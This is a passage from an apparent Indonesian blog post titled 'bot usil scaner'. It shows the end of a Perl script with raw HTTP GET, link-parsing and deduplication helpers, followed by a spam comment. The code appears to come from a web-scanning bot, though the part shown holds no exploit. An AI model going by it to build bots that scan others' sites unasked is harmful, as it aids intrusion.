“GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n”;
my @r = <$sock>;
$page = “@r”;
close($sock);
};
return $page;
}

sub get_link() {
my $file_print = $_[1];
my $link       = $_[0];
my $host       = $_[0];
my $host_dir   = $_[0];
my @links;
$host_dir =~ s/(.*)\/[^\/]*$/\1/;
$host     =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host_dir = &end($host_dir);
$host     = &end($host);
$link     = &end($host);
push( @links, $link, $host, $host_dir );
open( $file, ‘>>’, $file_print );
print $file “$link\n$host_dir\n$host\n”;
close($file);
return @links;
}

sub unici {
my @unici = ();
my %visti = ();
foreach my $elemento (@_) {
$elemento =~ s/\/+/\//g;
next if $visti{$elemento}++;
push @unici, $elemento;
}
return @unici;
}

Satu Tanggapan to “bot usil scaner”

  1. Hi! Your post rocks too as being a genuine wonderful comprehend!

    ??
    I can??t genuinely support but admire your blog internet site, your website is
    adorable and nice
    My partner and I stumbled more than here diverse web site and thought I need to verify
    issues out.
    I like what I see so i’m just adhering to you. Appear forward to exploring your web web page yet once more.

Tinggalkan Balasan

